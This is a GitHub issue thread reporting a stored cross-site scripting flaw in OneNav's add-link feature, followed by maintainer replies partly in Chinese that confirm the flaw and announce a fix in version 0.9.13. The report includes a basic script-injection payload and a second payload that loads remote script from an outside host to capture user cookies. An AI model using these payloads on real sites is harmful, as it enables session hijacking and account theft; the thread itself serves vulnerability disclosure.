### ISSUE TITLE
OneNav's add link function exists xss vul

### ISSUE THREAD

**Issue by alex123-2star** [helloxz/onenav#26]
add link function path
![image](https://user-images.githubusercontent.com/63630525/128303372-cd91d982-10d6-461d-899b-d2123f8f234b.png)
input xss payload 1 :"><script>alert("XSS")</script>
![image](https://user-images.githubusercontent.com/63630525/128304275-a9fe3bff-9153-4cf0-bbea-c5b511b88dd6.png)
click 添加 button
![image](https://user-images.githubusercontent.com/63630525/128304458-c781a1a1-ee82-4aba-901e-6d38c9a4f665.png)
alert xss  success
input xss payload 2:<sCRiPt sRC=//xss.pt/NZ9j></sCrIpT>
![image](https://user-images.githubusercontent.com/63630525/128304733-034fd7d3-69fa-443d-b585-f3845b21267a.png)
Get user cookie success

**Comment by alex123-2star** [comment]
![image](https://user-images.githubusercontent.com/63630525/128308317-889ccece-dd23-4c6d-a4a2-d01cf6953edc.png)

**Comment by helloxz** [comment]
您好，感谢您的反馈，目前后台确实没有做XSS过滤，一般正常的用户，不会通过后台权限自己给自己注入XSS代码，除非帐号、密码已经泄露。不过始终也算一个潜在风险，后续会增加XSS过滤和验证。

**Comment by nu11secur1ty** [comment]
Yes, there has a big problem:
Proof: https://streamable.com/ubtzio, so, please fix `add_link` feature on your already created account, dear friend.
KR

**Comment by OS-WS** [comment]
Hi @helloxz ,
Are you planning to fix this issue?

**Comment by helloxz** [comment]
@nu11secur1ty @OS-WS @alex123-2star Hello everyone, this issue is expected to be fixed in the next version, thanks for your feedback.

**Comment by nu11secur1ty** [comment]
Ok tnx and BR

**Comment by helloxz** [comment]
`0.9.13`已修复这个漏洞，感谢支持。
